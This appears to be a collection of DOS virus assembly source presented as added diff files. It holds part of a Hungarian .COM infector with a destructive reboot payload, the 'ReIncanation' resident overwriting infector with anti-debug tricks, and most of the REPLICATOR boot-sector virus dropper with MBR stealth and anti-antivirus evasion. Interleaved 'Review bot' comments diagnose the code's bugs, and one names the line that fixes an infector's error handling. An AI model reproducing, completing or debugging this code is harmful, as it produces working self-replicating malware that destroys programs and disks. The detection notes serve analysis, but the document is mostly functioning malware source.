MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
JNC INDH ; NINCS HIBA
JMP INDK ; HIBA TORTENT
INDH: MOV BX,AX ; A FILESZAM ATVITELE
MOV AX,5700H ; A KELETKEZESI IDO BEOLVASASA
INT 21H ; ES BEALLITASA
MOV [SI+FILIDO-TABL],CX
MOV [SI+FILDAT-TABL],DX
MOV AH,2CH ; A RENDSZERIDO BEOLVASASA
INT 21H
AND DH,111B ; A MASODPERCEK OSZTHATOK NYOLCCAL?
JNZ INDI ; NEM, A FILE-T CSAK MEGFEROZZUK
MOV AH,40H ; EZT A FILE-T MOST MEGGYILKOLJUK /HAHAHA/
MOV CX,5 ; A JMP FAR F000:FFF0 5 BYTE HOSSZU
MOV DX,SI ; DX A TABLAZAT KEZDETERE MUTAT
ADD DX,OFFSET RESET-TABL
INT 21H ; A FILE ELSO 5 BYTEJANAK ATALLITASA RESET-RE
JMP INDJ ; ENNEK MAR BEVEGEZTETETT
INDI: MOV AH,3FH ; OLVASAS A FILEBOL
MOV CX,3 ; AZ ELSO HAROM BYTE
MOV DX,FILKEZ-TABL ; A MEGFELELO CIMRE
ADD DX,SI
INT 21H ; BEOLVASNI
JC INDJ ; HIBA TORTENT
CMP AX,3 ; MIND A HAROM BYTEOT BEOLVASTA?
JNZ INDJ ; NEM, HIBA VOLT
MOV AX,4202H ; MUTATO A FILE VEGERE
MOV CX,0
MOV DX,0
INT 21H
JC INDJ ; TORTENT HIBA?
MOV CX,AX ; A FILE HOSSZA
SUB AX,3 ; MINUSZ 3, EZ LESZ AZ UJ INDITASI CIM
MOV [SI+UJKEZ-TABL+1],AX
ADD CX,OFFSET TABL+100H ; A TABLAZAT KEZDOCIME AZ UJ VIRUSBAN
MOV DI,SI ; A TABLAZAT KEZDETE
SUB DI,OFFSET TABL-TBLC-1
MOV [DI],CX ; A MOV DX, UTASITAS PARAMETERE
MOV AH,40H ; KIIRAS A FILE-BA
MOV CX,OFFSET HOSSZ ; A VIRUS HOSSZA
MOV DX,SI ; A TABLAZAT KEZDOCIME
SUB DX,OFFSET TABL ; MINUSZ A VIRUSTORZS HOSSZA
INT 21H ; KIIRAS
JC INDJ ; HIBA TORTENT
CMP AX,OFFSET HOSSZ ; MINDEN BYTEOT KIIRT?
JNZ INDJ ; NEM
MOV AX,4200H ; MUTATO A FILE ELEJERE
MOV CX,0
MOV DX,0
INT 21H
JC INDJ ; HIBA TORTENT?
MOV AH,40H ; KIIRAS A FILE-BA
MOV CX,3 ; AZ ELSO 3 BYTE KIIRASA
MOV DX,SI
ADD DX,OFFSET UJKEZ-TABL
INT 21H ; KIIRAS
INDJ: MOV DX,[SI+FILDAT-TABL]
MOV CX,[SI+FILIDO-TABL]
DB 81H,0E1H,0E0H,0FFH ; AND CX,0FFE0H
OR CX,OFFSET 11111B ; AZ IDO 62 MASODPERC
MOV AX,5701H ; A KELETKEZESI DATUM ES IDO VISSZAIRASA
INT 21H ; ES A FERTOZES JELZESE
MOV AH,3EH ; FILE LEZARASA
INT 21H
INDK: MOV AX,4301H ; A REGI ATTRIBUTUM VISSZAALLITASA
MOV CX,[SI+FILATT-TABL]
MOV DX,FSPEC-TABL
ADD DX,SI ; A FILE SPECIFIKACIO CIME
INT 21H
IND7: PUSH DS ; DS ELMENTESE
MOV AH,1AH ; A DTA REGI CIMENEK BEALLITASA
MOV DX,WORD PTR [SI+DTACIM-TABL]
MOV DS,WORD PTR [SI+DTACIM-TABL+2]
INT 21H
POP DS ; DS VISSZAALLITASA
IND2: POP CX
XOR AX,AX ; AX=0
XOR BX,BX ; BX=0
XOR DX,DX ; DX=0
XOR SI,SI ; SI=0
MOV DI,100H ; 100H A VEREMBE
PUSH DI
XOR DI,DI ; DI=0
RET 0FFFFH
TABL EQU $
DTACIM DD 0
FILIDO DW 0
FILDAT DW 0
FILATT DW 0
FILKEZ DB 0,0,0
UJKEZ DB 0,0,0
FKER DB '*.COM',0
UTCIM DW 0
FAKT DW 0
SZOVEG DB 'PATH='
FSPEC DB 40H DUP(' ')
UJDTA DB 2BH DUP(0)
RESET DB 0EAH,0F0H,0FFH,0,0F0H
VEG EQU $
VIRUS ENDS
END
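Review bot: As listed, the three-byte patch stub `UJKEZ DB 0,0,0` never receives a JMP opcode: the `MOV [SI+UJKEZ-TABL+1],AX` after the seek-to-end stores only the rel16 displacement (file length minus 3), and no instruction writes 0E9h into the stub's first byte before the final `AH=40h` write at `INDI` lays those three bytes over the host's entry, so an infected .COM would begin with `00 xx xx` rather than a jump to the appended body; either the listing was deliberately neutered or this is a defect, and a header comment should say which. For anyone using this as a detection reference: the infection marker is the host's timestamp seconds field forced to 31 (`OR CX,11111B` at `INDJ`, i.e. "62 seconds"), which is also what `INDD` tests to skip files already touched, and the `AND DH,111B` branch after the `AH=2Ch` time call means that when the system seconds are a multiple of eight the sample does not infect but overwrites the host's first five bytes with the `RESET` stub `JMP FAR F000:FFF0`, a destructive reboot payload. A two-line comment at `INDIT` along the lines of `; Appending *.COM infector walking PATH=; marker = timestamp seconds 62; payload = 5-byte F000:FFF0 reset stub written at offset 0 when sec mod 8 == 0` would make the listing self-describing.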
@@ -0,0 +1,147 @@
start:
and al,21h
;anti_disassembler & anti_debugger
mov cx,09ebh
mov ax,0fe05h
jmp $-2
add ah,03bh
jmp $-10
;anti_debugger
mov ax,3503h ;save int 3h in bx
int 21h ;do it
mov ah,25h ;set new int 3h...
mov dx,offset new_int_3 ;...to new_int_3
int 21h ;do it
xchg bx,dx ;exchange bx,dx (restore original int 3h)
int 21h ;do it
;anti_vsafe
mov ax,0f9f2h
add ax,10h
mov dx,5935h
add dx,10h
mov bl,10h
sub bl,10h
int 16h
mov ah,9h ;write string
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden.
int 21h ;do it
mov ax,9999h ;put 9999h in ax (for resident test)
int 21h ;do it
cmp bx,9999h ;compare bx,9999h
je already_there ;if bx=9999h, we are already resident and goto already_there
jmp makemegotsr ;else goto makemegotsr
already_there: ;already resident
int 20h ;exit
makemegotsr:
mov ax,3521h ; get int 21h
int 21h ;do it
mov word ptr cs:old21,bx ; save old int 21h
mov word ptr cs:old21+2,es ;... save
mov dx,offset new21 ; new int 21 comes to offset new21
mov ax,2521h ; set new int 21h
int 21h ; do it
push cs ; push it
pop ds ; pop it
mov dx,offset endvir ; put everything of us in memory
int 27h ; do it
new21: pushf ;new int 21
cmp ax,9999h ;resident test ???
jnz no_installation_check ;if no test goto no_install_check
xchg ax,bx ;if resident test, put 9999h in bx
no_installation_check: ;no_install_check
cmp ax,4b00h ;is there something executed?
jz infect ;yes, goto infect
jmp short end21 ;no, jmp to normal old int 21h
infect: ;infect the executed file
mov ax,4301h ;set attributes
xor cx,cx ;to 0
int 21h ;do it
mov ax,3d02h ;open file
int 21h ;do it
mov bx,ax ;put ax in bx, or.. xchg ax,bx.. but that doesn't work here
push ax ;push all
push bx
push cx
push dx
push ds
push cs
pop ds
mov ax,4200h ;seek
xor cx,cx ;at beginning of tha file
cwd
int 21h ;do it
mov cx,offset endvir-offset start ;how much bytes to write
mov ah,40h ;write
mov dx,offset start ;from offset start
int 21h ;do it
cwd ; set date/time
xor cx,cx ; to zero
mov ax,5701h ;function for date/time
int 21h ;do it
mov ah,3eh ; close file
int 21h ;do it
mov ah,2ah ;get date
int 21h ;do it
cmp dh,4 ;compare month(dh) with 4
jne not_my_birthday ;not the 4th month, goto not_my_birthday
monat_ok:cmp dl,21 ;else compare day(dl) with 21
jne not_my_birthday ;not the 21th, goto not_my_birthday
tag_ok:mov ah,9h ;if it is the 21.April write message
mov dx,offset text ;of offset text
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
jmp restore ;goto restore (tha registers)
not_my_birthday: ;if it is not_my_birthday
mov ah,9h ;write message
mov dx,offset file_not_found ;Befehl oder Dateiname nicht gefunden. (English: Bad command or filename.)
int 21h ;do it
restore:
pop ds ; pop all
pop dx
pop cx
pop bx
pop ax
end21: popf ; pop far
db 0eah ; jmp far (?)
old21 dw 0,0 ; where to store the old INT21
text: db'ReIncanation written by Spooky. Austria 1996',0dh,0ah,'$' ;message for debugger or date 21.April
file_not_found: db'Befehl oder Dateiname nicht gefunden.',0dh,0ah,'$' ;message file not found
new_int_3: ;new interrupt 3h for the debugger
mov ah,9h ;write string to standard output
mov dx,offset text ;text to write
int 21h ;do it
mov ah,00h ;wait until keypressed
int 16h ;do it
int 20h ;-> terminate debugging
endvir label byte ; End of file
end start
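Review bot: The open at `mov ax,3d02h / int 21h` is followed directly by `mov bx,ax` with no carry check, so when the open fails (read-only media, sharing violation) AX holds a DOS error code and that value becomes the handle for the `ah,40h` write and the `ah,3eh` close — with error 2 (file not found) that is the standard-error handle, so the body goes to the console rather than a file; `jc end21` immediately after that `int 21h` is the missing line. The register saves `push ax .. push ds` come after AX and CX have already been overwritten (AX = handle from the open, CX = 0 from the 4301h attribute call), so the matching pops at `restore` put those clobbered values back and `old21` receives AX = handle / CX = 0 instead of the caller's 4B00h EXEC request; the pushes belong at the top of `infect`, before the attribute call. For anyone using this as a reference sample: the infection is overwriting (seek to offset 0, then write `endvir-start` bytes), so any program DOS EXECs is destroyed rather than patched, and the `5701h` call zeroes date and time — a usable detection marker, but it is never checked as a re-infection test, so a host is rewritten on every execution. A header comment such as `; Resident overwriting infector hooked on INT 21h/4B00h; hosts are destroyed, not patched; host timestamp is zeroed` would make that explicit.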
@@ -0,0 +1,717 @@
;**********************************************************************************************
;* *
;* FILE: DROP_REP.ASM (c) 1993 *
;* PURPOSE: Dropper containing REPLICATOR boot sector virus *
;* AUTHOR: Willoughby DATE: 04/19/93 *
;* *
;**********************************************************************************************
;
;------------------------------------------ EQUATES -------------------------------------------
;
AT_TAG EQU 0FC
BAD_TAG EQU 0BAD
BIOS13_OFFSET EQU 004C
BIOS13_SEGMENT EQU 004E
BIOS40_SEGMENT EQU 0103
BPB_NUM_SECT EQU 013
CLEAR EQU 00
INF_TAG1 EQU 0ABCD
INF_TAG2 EQU 0CDEF
MEM_SIZE EQU 0413
MOTOR_ON EQU 043F
PARTITION_OFFSET EQU 01BE
ROM_SEGMENT EQU 0F0
SET EQU 0BB
SYS_ID_OFFSET EQU 0FFFE
SYS_ID_SEGMENT EQU 0F000
;
;---------------------------------------- MAIN PROGRAM ----------------------------------------
;
CODE SEGMENT
;
;----------------------------
;Dropper for REPLICATOR virus
;----------------------------
;
DROPPER:
;
;Check system type to determine if the INT1Ah read-real-time-clock function is supported (AT
;or better). If not, skip the trigger date check/storage process and store "BAD" tag for
;the benefit of the REPLICATOR infection analysis program (a future release).
;
MOV AX,SYS_ID_SEGMENT
MOV DS,AX ;Set DS to ROM segment.
CMP B[SYS_ID_OFFSET],AT_TAG ;Check system ID byte for AT system tag.
PUSH CS
POP DS ;Set DS to dropper code segment.
JE >D1 ;If AT, check date and store before infection.
MOV DROP_MODAY,BAD_TAG ;If not, store hard drive drop date "BAD" tag
;in VIRUS_DIR.
JMP >D3 ;Then continue infection process.
;
;Determine if date is equal to or greater than preselected infection date. This allows the
;dropper program to pass initial anti-viral scanning/activity monitoring by remaining dormant
;until a later date. Also, store month, day and year of pending fixed disk infection in
;VIRUS_DIR.
;
D1:
MOV AH,04 ;Set read-date function.
INT 01A ;BIOS read-clock interrupt.
MOV DROP_YEAR,CX ;Store infection year in VIRUS_DIR.
MOV DROP_MODAY,DX ;Store month and day in VIRUS_DIR.
CMP CX,01993 ;Compare system year with 1993 trigger year
;(CH=century, CL=year, both in BCD).
JA >D2 ;If year>trigger year, proceed w/infection.
JB >D5 ;If year<trigger year, exit and do not infect.
CMP DX,0101 ;Compare system date w/Jan. 1st (DH=month,
;DL=day, both in BCD). The date Jan. 1
;effectively disables this function.
JB >D5 ;If the current date is not => the trigger
;date, don't infect.
;
;Store time of pending fixed disk infection in VIRUS_DIR.
;
D2:
MOV AH,02 ;Select read-time function.
INT 01A ;BIOS read-clock interrupt.
MOV DROP_TIME,CX ;Store infection hour and minute in VIRUS_DIR.
;
;Determine if an anti-viral program is monitoring viral activity via INT40h. If so, don't
;infect.
;
D3:
PUSH DS ;Preserve DS.
XOR AX,AX
MOV DS,AX ;Zero DS to point to BIOS data table.
CMP B[BIOS40_SEGMENT],ROM_SEGMENT ;Has INT40h been stolen from BIOS ROM by an
;anti-virus program?
POP DS ;Restore DS.
JB >D5 ;If INT40h has been stolen, do not attempt
;infection.
;
;Load MBR.
;
PUSH CS
POP ES ;Set ES to dropper code segment.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,MBR_BUFFER ;Set disk I/O buffer offset.
MOV CX,0001 ;Track 0, sector 1.
MOV DX,0080 ;Head 0, fixed disk 1.
INT 013 ;Read MBR.
JB >D5 ;Exit if flag=failure.
;
;Check MBR for infection.
;
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check for VIRUS_BOOT infection tag.
JE >D5 ;If infected then exit.
;
;Check fixed disk for an unused first track (head 0, cylinder 0) to avoid damaging any FAT
;which might be present in that area. This is accomplished by checking the partition table
;value which holds the number of the starting head of the first partition. If this number is
;equal to or greater than 01, the first track is not in use.
;
CMP B[BX+PARTITION_OFFSET+1],01 ;Check for unused track on fixed disk by
;checking partition table data.
JB >D5 ;If in use, exit to avoid damage to FAT.
;
;Increment hard disk infection counter for pending infection.
;
INC W[OFFSET HARD_COUNT]
;
;Write original MBR to its new location. Also, determine if VIRUS_DIR is present on the fixed
;disk. If so, don't write VIRUS_DIR to disk so that the previous infection counts and dates
;are retained.
;
MOV AX,0201 ;Select read-1-sector function.
MOV BX,MBR_BUFFER+0200 ;Set disk I/O buffer offset.
MOV CL,09 ;Track 0, sector 9.
INT 013 ;Read VIRUS_DIR sector.
JB >D5 ;Exit if flag=failure.
CMP W[BX+OFFSET INFECT_TAG2-0400],INF_TAG2 ;Check for VIRUS_DIR infection tag.
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,VIRUS_DIR ;Specify VIRUS_DIR buffer offset.
JNE >D4 ;If VIRUS_DIR is not present, write
;both VIRUS_DIR and MBR.
MOV AX,0301 ;If present, select write-1-sector
;function.
MOV BX,MBR_BUFFER ;Specify MBR buffer address.
MOV CL,0A ;Specify relocation sector for MBR.
D4:
INT 013 ;Write to specified sector(s).
JB >D5 ;Exit if flag=failure.
;
;Copy partition table data to virus.
;
MOV SI,MBR_BUFFER+PARTITION_OFFSET ;Set source offset.
MOV DI,VIRUS_BOOT+PARTITION_OFFSET ;Set destination offset.
MOV CL,021 ;Set repetition count (number of words) for
;partition table move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move partition table to virus.
;
;Write virus to MBR.
;
MOV AX,0301 ;Select write-1-sector function.
MOV BX,VIRUS_BOOT ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
INT 013 ;Write virus with attached partition table
;to MBR.
;
;Terminate dropper.
;
D5:
MOV AX,04C00 ;Select terminate w/return code function.
INT 021 ;Terminate dropper.
;
DB 86 DUP 00 ;Pad bytes to avoid possible DMA I/O errors.
;
;**********************************************************************************************
;* *
;* REPLICATOR boot sector virus *
;* *
;**********************************************************************************************
;
VIRUS_BOOT:
;
JMP >B1 ;Jump over BPB data to virus entry point.
;
BPB_START:
;
DB 60 DUP 00 ;Reserve space for diskette BPB data.
;
BPB_END:
;
;------------
;Boot routine
;------------
;
;Set location of stack.
;
B1:
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
CLI ;Disable interrupts.
MOV SS,AX ;Zero SS.
MOV AX,07C00 ;Load location of stack to AX.
MOV SP,AX ;Set SP=7C00h.
STI ;Enable interrupts.
PUSH DS ;Store return address of boot record to be
PUSH AX ;popped from the stack when VIRUS_BOOT
;returns to it (0000:7C00h).
;
;Read INT13h segment and offset from BIOS data table and store within VIRUS_BOOT.
;
MOV AX,W[BIOS13_OFFSET] ;Load BIOS INT13h vector offset stored at
;0000:004Ch.
MOV W[OFFSET BIOS_OFFSET+07A00],AX ;Store BIOS INT13h offset value in virus data
;area.
MOV CL,06 ;Set CL for virus segment shift. Location of
;this operation chosen to defeat anti-viral
;generic code-segment scans.
MOV AX,W[BIOS13_SEGMENT] ;Load BIOS INT13h vector segment stored at
;0000:004Eh.
MOV W[OFFSET BIOS_SEGMENT+07A00],AX ;Store BIOS INT13h segment value in virus data
;area.
;
;Calculate virus upper memory segment value and store within VIRUS_BOOT.
;
MOV BX,MEM_SIZE ;Load BX with address 0413h. This defeats
;anti-viral searches for 0413h MOV operations.
MOV AX,W[BX] ;Load memory size (in KB) stored at 0000:0413h.
DEC AX ;Calculate value for 2KB reduction of
DEC AX ;conventional memory.
SHL AX,CL ;Calculate virus segment.
MOV W[OFFSET REENTRY_SEGMENT+07A00],AX ;Store virus segment value in virus data area.
MOV ES,AX ;Store in ES to be used to move virus to top of
;conventional memory.
;
;Move VIRUS_BOOT from 0000:7C00h to top of memory - 2KB.
;
MOV SI,07C00 ;Set source offset address for virus move.
XOR DI,DI ;Set destination offset address to 0000h.
MOV CX,0100 ;Set repetition count (number of words) for
;move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move virus from DS:7C00h to ES:0000h.
CS JMP D[OFFSET REENTRY_OFFSET+07A00] ;Jump to self in new location via stored
;address.
;
;Load VIRUS_DIR and original boot sector/MBR to top of memory - 1.5KB.
;
NEW_LOCATION:
;
PUSH CS
POP DS ;Set DS=CS.
MOV AX,0202 ;Select read-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,B[OFFSET SECTOR-0200] ;VIRUS_DIR sector determined by value stored in
;VIRUS_BOOT.
CMP CL,09 ;Test for hard drive (HD) boot.
JE >B2 ;Yes, booted from HD.
INC DH ;Select head 1, floppy drive DL.
B2:
INT 013 ;Read VIRUS_DIR and original boot record.
JNB >B3 ;Continue if flag=success.
JMP B5 ;Exit if flag=failure.
;
;Copy original boot sector/MBR down to 0000:7C00h for later execution.
;
B3:
XOR AX,AX ;Zero AX.
MOV ES,AX ;Zero ES (destination segment value).
MOV SI,0400 ;Set source offset address for virus move.
MOV DI,07C00 ;Set destination offset address for move.
MOV CX,0100 ;Set repetition count (# of words) for move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Copy original boot record to 0000:7C00h.
;
;Determine if the virus is already installed on the system in the memory above. If it is, in
;order to prevent multiple installations of the virus in memory and the problems that this can
;cause, the virus will be removed from memory. This will be done by restoring the BIOS data
;table values that it has changed to their original, pre-infection values.
;
CMP W[OFFSET INFECT_TAG1+0600],INF_TAG1 ;Check for presence of virus above us.
JNE >B4 ;If it's not there, exit removal routine.
MOV AX,W[OFFSET BIOS_OFFSET+0600] ;Get the pre-infection INT13h offset value from
;the virus installed in memory.
PUSH AX ;Save that value on the stack.
MOV AX,W[OFFSET BIOS_SEGMENT+0600] ;Get the pre-infection INT13h segment value.
PUSH DS ;Preserve DS.
XOR BX,BX ;Zero BX.
MOV DS,BX ;Zero DS.
MOV W[BIOS13_SEGMENT],AX ;Restore BIOS data table to pre-infection
;segment value.
POP AX ;Pop pre-infection offset value from stack.
MOV W[BIOS13_OFFSET],AX ;Restore BIOS data table to pre-infection
;offset value.
MOV BX,MEM_SIZE ;Move data table address for conventional
;memory size into BX.
ADD W[BX],02 ;Increase memory size value by 2KB to restore
;it to pre-infection value.
POP DS ;Restore DS.
JMP >B5 ;Exit without installing virus in memory.
;
;Test for HD boot and, if true, install virus in memory.
;
B4:
CMP DL,080 ;Booted from HD?
JE >B6 ;If so, install virus and exit.
;
;Must be booting from floppy, so load MBR to top of memory - 1KB.
;
PUSH CS
POP ES ;Set ES=CS.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,0400 ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
MOV DX,0080 ;Head 0, HD 1.
INT 013 ;Read MBR.
JB >B5 ;Exit if flag=failure and do not steal INT13h.
;
;Check MBR for infection.
;
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check MBR for infection tag.
JE >B5 ;If infected, exit and do not steal INT13h.
;
;Check fixed disk for an unused first track (head 0, cylinder 0) to avoid damaging any FAT
;which might be present in that area.
;
CMP B[BX+PARTITION_OFFSET+1],01 ;Check for unused track on HD by checking
;partition table data (start head => 1).
JB >B5 ;If first track is in use, exit to avoid
;FAT damage and do not steal INT13h vector.
;
;Increment hard disk infection counter for pending infection.
;
INC W[OFFSET HARD_COUNT-0200]
;
;Write VIRUS_DIR and original MBR to fixed disk sectors 09h and 0Ah respectively.
;
MOV AX,0302 ;Select write-2-sectors function.
MOV BX,0200 ;Set disk I/O buffer offset.
MOV CL,09 ;Track 0, sector 9.
MOV B[OFFSET SECTOR-0200],CL ;Store destination sector number in VIRUS_BOOT.
INT 013 ;Move VIRUS_DIR to sector 09h and original MBR
;to sector 0Ah.
JB >B5 ;Exit if flag=failure and do not steal INT13h.
;
;Copy partition table data to VIRUS_BOOT.
;
MOV SI,PARTITION_OFFSET+0400 ;Set source offset.
MOV DI,PARTITION_OFFSET ;Set destination offset.
MOV CL,021 ;Set repetition count (# of words) move.
CLD ;Clear direction flag (fwd).
REP MOVSW ;Move partition table to virus.
;
;Write VIRUS_BOOT to MBR and exit without installing virus in memory. Subsequent HD boot will
;do this.
;
MOV AX,0301 ;Select write-1-sector function.
XOR BX,BX ;Set disk I/O buffer offset.
MOV CL,01 ;Track 0, sector 1.
INT 013 ;Write virus w/attached partition table to MBR.
B5:
XOR DX,DX ;Restore DX back to value at floppy boot
;(head 0, drive 0).
RETF ;Exit, do not steal INT13h or reduce mem. size.
;Return to boot sector code at 0000:7C00h.
;
;Steal BIOS INT13h vector and reduce memory size to install virus as TSR.
;
B6:
MOV BX,W[OFFSET REENTRY_SEGMENT-0200] ;Load VIRUS_DIR segment value to BX.
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
MOV W[BIOS13_SEGMENT],BX ;Point INT13h vector to VIRUS_DIR
;segment.
MOV W[BIOS13_OFFSET],OFFSET VIRUS_INT-0200 ;Point INT13h vector to VIRUS_INT
;INT13h handler offset in VIRUS_DIR.
MOV BX,MEM_SIZE ;Load BIOS data table address for
;memory size to BX.
SUB W[BX],02 ;Reduce memory by 2KB to protect virus
;area from being overwritten by other
;programs.
RETF ;Return to boot sector code at
;0000:7C00h.
;
;Reserve storage locations for virus data and preset some known values.
;
BIOS_OFFSET DW ? ;BIOS INT13 offset.
BIOS_SEGMENT DW ? ;BIOS INT13 segment.
REENTRY_OFFSET DW NEW_LOCATION-0200 ;Virus reentry offset.
REENTRY_SEGMENT DW ? ;Virus reentry segment.
INFECT_TAG1 DW INF_TAG1 ;Infection tag for VIRUS_BOOT.
SECTOR DB 09 ;Sector # containing VIRUS_DIR.
;
VIRUS_BOOT_END:
;
;Reserve end-of-sector text area and establish valid boot record tag.
;
DB 195 DUP 00 ;End-of-sector pad bytes.
DB 055,0AA ;Boot record tag.
;
SECTOR_END:
;
;End of boot sector/MBR viral code.
;----------------------------------------------------------------------------------------------
;Start of directory sector viral code.
;
VIRUS_DIR:
;
;Create four empty root directory entries at the beginning of the sector.
;
DB 128 DUP 00
;
;--------------
;INT13h Handler
;--------------
;
VIRUS_INT:
;
CMP DL,080 ;Hard drive I/O?
JNE >F1 ;No, exit to floppy test routine.
;
;Stealth routine to return original, uninfected MBR to any anti-viral scan program. Also,
;prevents writes to the MBR to prevent disinfection of the fixed disk while the virus is
;active in memory.
;
CMP CX,0001 ;Track 0, sector 1?
JNE >U1 ;If not, no need for the stealth routine.
;Instead, jump to infect. count. update.
CMP DH,00 ;Head 0?
JNE >E2 ;If not, exit stealth routine.
CMP AH,03 ;Write sector?
JE >S1 ;Yes, simulate I/O.
PUSH CX ;Preserve CX (track/sector #).
MOV CL,0A ;Redirect I/O to sector 0Ah, the new location
;of the original MBR.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Send scan program original MBR
;instead of infected MBR.
POP CX ;Restore original track/sector value requested
;the calling routine. Anti-viral scanner will
;monitor the contents of CL upon return.
S1:
XOR AH,AH ;Zero AH to simulate return value of
;successful I/O.
CLC ;Clear carry flag to simulate successful I/O
;to calling routine.
RETF 2 ;Return to calling routine.
;
;Infection counter update routine writes VIRUS_DIR containing the lastest floppy infection
;counter value to the hard drive only if there has been a diskette infection since the last
;hard drive access.
;
U1:
PUSH DS ;Preserve DS.
PUSH CS
POP DS ;Set DS=CS
CMP B[OFFSET UPDATE_FLAG-0200],SET ;Floppy infected since last HD access?
JNE >U2 ;No, exit counter update routine.
MOV B[OFFSET UPDATE_FLAG-0200],CLEAR ;Yes, clear floppy infect flag.
PUSH ES ;Preserve ES.
PUSH CS
POP ES ;Set ES=CS
PUSH AX ;Preserve registers.
PUSH BX
PUSH CX
PUSH DX
MOV AX,0301 ;Select write-1-sector function.
MOV BX,0200 ;Set disk I/O buffer start address.
MOV CX,0009 ;Specify track 0, sector 9.
MOV DH,00 ;Specify head 0.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Save VIRUS_DIR w/new infect. count to HD.
POP DX ;Restore registers
POP CX
POP BX
POP AX
POP ES
U2:
POP DS
JMP >E2 ;Exit to handler exit.
;
;Check the INT13h register values for drive A or B read or write request. This prevents
;problems caused by the virus infecting a diskette during format. Also, by limiting infection
;attempts to the first two floppy drives, it avoids the problems it would cause to a tape
;backup system emulating a third or fourth floppy drive.
;
F1:
PUSH DS ;Preserve DS.
PUSH AX ;Preserve AX.
CMP DL,01 ;Floppy I/O (A or B)?
JA >E1 ;No, don't infect.
CMP AH,02 ;Check for read function.
JB >E1 ;Exit if below read function.
CMP AH,03 ;Check for write function.
JA >E1 ;Exit if above write function.
;
;Check diskette motor status to limit infection attempt to first INT13h call thereby preventing
;suspicious floppy drive noises.
;
XOR AX,AX ;Zero AX.
MOV DS,AX ;Zero DS.
MOV AL,DL ;Move motor-on test bit into AL.
INC AL ;Position bit for floppy 'DL'.
TEST B[MOTOR_ON],AL ;Test for floppy motor on.
JNE >E1 ;Yes, don't infect.
;
;Check for presence of TSR anti-viral monitoring program to avoid detection of boot sector
;write by virus. If present, don't attempt infection.
;
CMP B[BIOS40_SEGMENT],ROM_SEGMENT ;Has INT40h been stolen from BIOS ROM by an
;anti-virus program?
JB >E1 ;If so, do not attempt infection.
;
;Infect floppy.
;
POP AX ;Restore AX.
POP DS ;Restore DS.
PUSHF
CS CALL D[OFFSET BIOS_OFFSET-0200] ;Give calling routine what it wants.
PUSHF ;Preserve flags.
CALL >F2 ;Then attempt infection.
POPF ;Restore flags to hide I/O errors.
RETF 2 ;Return to calling routine.
;
;Jump to BIOS.
;
E1:
POP AX ;Restore AX.
POP DS ;Restore DS.
E2:
CS JMP D[OFFSET BIOS_OFFSET-0200] ;Jump through BIOS to calling routine.
;
;Diskette infection routine.
;
F2:
PUSH AX ;Preserve all registers.
PUSH BX
PUSH CX
PUSH DX
PUSH DS
PUSH ES
PUSH SI
PUSH DI
;
;Check system type to determine if the INT1Ah read-real-time-clock function is supported (AT
;or better). If not, skip the date check/storage process and store floppy infection "BAD"
;date tag in VIRUS_DIR.
;
MOV AX,SYS_ID_SEGMENT
MOV DS,AX ;Set DS to ROM offset.
CMP B[SYS_ID_OFFSET],AT_TAG ;Check system ID byte for AT system tag.
PUSH CS
POP DS ;Set DS to point to dropper segment.
JE >F3 ;If AT, check date and store before infection.
MOV W[OFFSET FLOPPY_MODAY-0200],BAD_TAG ;Store date "BAD" tag in VIRUS_DIR.
JMP >F4 ;Then continue infection process.
;
;Store month, day and year of pending floppy diskette infection in VIRUS_DIR.
;
F3:
PUSH DX
MOV AH,04 ;Set read-date function.
INT 01A ;BIOS read-clock interrupt.
MOV W[OFFSET FLOPPY_YEAR-0200],CX ;Store infection year in VIRUS_DIR.
MOV W[OFFSET FLOPPY_MODAY-0200],DX ;Store month and day in VIRUS_DIR.
;
;Store time of pending floppy diskette infection in VIRUS_DIR.
;
MOV AH,02 ;Select read-time function.
INT 01A ;BIOS read-clock interrupt.
MOV W[OFFSET FLOPPY_TIME-0200],CX ;Store infection hour and minute in VIRUS_DIR.
POP DX
;
;Load diskette boot sector to top of memory - 1KB.
;
F4:
PUSH CS
POP ES ;Set ES=CS.
MOV AX,0201 ;Select read-1-sector function.
MOV BX,0400 ;Set disk I/O buffer offset.
MOV CX,0001 ;Track 0, sector 1.
MOV DH,00 ;Head 0, drive DL.
PUSHF
CALL D[OFFSET BIOS_OFFSET-0200] ;Read drive DL boot sector to buffer by
;calling INT13h routine in BIOS ROM.
JNB >F5 ;Proceed with infection if flag=success.
JMP F7 ;Otherwise, exit.
;
;Check diskette boot sector for infection.
;
F5:
CMP W[BX+OFFSET INFECT_TAG1-0200],INF_TAG1 ;Check for VIRUS_BOOT infection tag.
JE >F7 ;If infected, then exit.
;
;Determine diskette type from BPB data to allow VIRUS_DIR and original boot sector to be
;written to the last two root directory sectors. This maximizes the number of files that can
;be stored on the diskette after infection. Also, detect non-standard formats and do not
;infect to prevent damage.
;
MOV CL,02 ;VIRUS_DIR sector for 360K.
MOV AX,W[BX+BPB_NUM_SECT] ;Load # sect. on floppy from BPB.
CMP AX,02D0 ;Check for # sectors on 360K.
JE >F6 ;Exit if 360K floppy.
MOV CL,04 ;VIRUS_DIR sector for 720K.
CMP AX,05A0 ;Check for # sectors on 720K.
JE >F6 ;Exit if 720K floppy.
MOV CL,0D ;VIRUS_DIR sector for 1.2M.
CMP AX,0960 ;Check for # sectors on 1.2M.
JE >F6 ;Exit if 1.2M floppy.
MOV CL,0E ;VIRUS_DIR sector for 1.44M.
CMP AX,0B40 ;Check for # sectors on 1.44M.
JE >F6 ;Exit if 1.44M floppy.
